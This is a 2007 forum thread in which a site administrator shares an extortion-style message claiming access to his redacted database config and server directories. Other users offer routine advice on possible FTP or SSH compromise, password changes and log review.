PDA

View Full Version : Possible security hole


mrpotatohead
03-28-2007, 04:45 PM
Hi guys,

I got a message through PM today with the following contained:

"Dear admin, thank you for your interest.

As you have read at www.paradox-security.de.vu I checked your homepage and found critical security holes.


Proof:
Your SQL Data of the forum
$config['Database']['dbname'] = **removed for purposes of post**;
$config['MasterServer']['servername'] = **removed for purposes of post**
$config['MasterServer']['port'] =**removed for purposes of post**
$config['MasterServer']['username'] = **removed for purposes of post**
$config['MasterServer']['password'] = **removed for purposes of post**




And a part of your document root structure:


[barcrawl] DIR 05.03.2007 19:44:19 joemcd/joemcd drwxr-xr-x Info
[bbwebsite] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[celebritybb] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[cgi-bin] DIR 01.08.2006 19:23:42 joemcd/joemcd drwxr-xr-x Info
[contact] DIR 03.01.2007 17:06:32 joemcd/joemcd drwxr-xr-x Info
[dump] DIR 03.01.2007 17:06:36 joemcd/joemcd drwxr-xr-x Info
[faq] DIR 03.01.2007 17:09:17 joemcd/joemcd drwxr-xr-x Info
[forums] DIR 18.01.2007 09:27:29 joemcd/joemcd drwxr-xr-x Info
[frozen-illusion] DIR 03.01.2007 17:09:17 joemcd/joemcd drwxr-xr-x Info
[frozenillusion] DIR 06.02.2007 22:39:18 joemcd/joemcd drwxr-xr-x Info
[jmcdesig] DIR 20.08.2006 12:47:31 joemcd/joemcd drwxr-xr-x Info
[jmcdesigns] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[newsfeed] DIR 03.01.2007 17:06:37 joemcd/joemcd drwxr-xr-x Info
[newsletter] DIR 03.01.2007 17:09:12 joemcd/joemcd drwxr-xr-x Info
[nutv] DIR 08.03.2007 17:23:58 joemcd/joemcd drwxr-xr-x Info
[portal] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[research] DIR 27.01.2007 16:12:06 joemcd/joemcd drwxr-xr-x Info
[sifr] DIR 03.01.2007 17:09:17 joemcd/joemcd drwxr-xr-x Info





This security hole is very critical as you can see, because the attacker hase complete Server access.

If you want to know more I?ll give you my paypal address to transfer the money (100 EUR), otherwise I wish you good luck, and I hope that I could help you.

greez
paradoX


Please don`t reply to this PM. For contact write an email."

What can I do to improve the security? Any idea what this security hole is?!

I'm changing all my passwords now...


- Joe

nexialys
03-28-2007, 04:50 PM
thru PM where?!

it is not a security hole, you have someone with ftp access to your server, and this is not related to vBulletin... ask your HOST to verify the accesses...

and how i read this, you hired a moron to check for your security, and he is proving his stupidity by telling you nothing about your security holes...

don't pay him the 100$ he requires....

mrpotatohead
03-28-2007, 04:58 PM
It was through PM on my website - and that's the thing, never asked anyone for any security advice! But will look in to this - thanks! :)

bashy
03-29-2007, 03:47 PM
What you want to be asking yourself is, How did he get this info?

Proof:
Your SQL Data of the forum
$config['Database']['dbname'] = **removed for purposes of post**;
$config['MasterServer']['servername'] = **removed for purposes of post**
$config['MasterServer']['port'] =**removed for purposes of post**
$config['MasterServer']['username'] = **removed for purposes of post**
$config['MasterServer']['password'] = **removed for purposes of post**

Reeve of shinra
03-29-2007, 05:51 PM
He must have ftp or ssh access to your site...

Calash
03-29-2007, 07:15 PM
Could be done with a shell script, or if it is shared hosting there may be a permission issue allowing others on the same server/cluster read access to your files...hard to say.

Changing the passwords is the first step, next would be to review your log files from before you got that email. Look for odd requests that contain URL's or other data. It will take a bit but you may be able to locate how he got the info.

moorediddy
04-02-2007, 07:43 PM
Anyone else getting this? I got the same exact message on mine... it's obviously from an FTP/SSH access to my config files.

bashy
04-03-2007, 06:53 PM
you both aint on the same server are you?
Perhaps someone is accessing the information using ssh thats not secured?

mlomenzo
08-13-2007, 05:59 PM
I agree that it seems like someone has ftp access to your site. Deifintely check with your hosting company. Post an update when you know whats going on.

Good Luck
Mike

tipoboy
08-13-2007, 07:38 PM
this thread was started in april lol:) its now august:confused: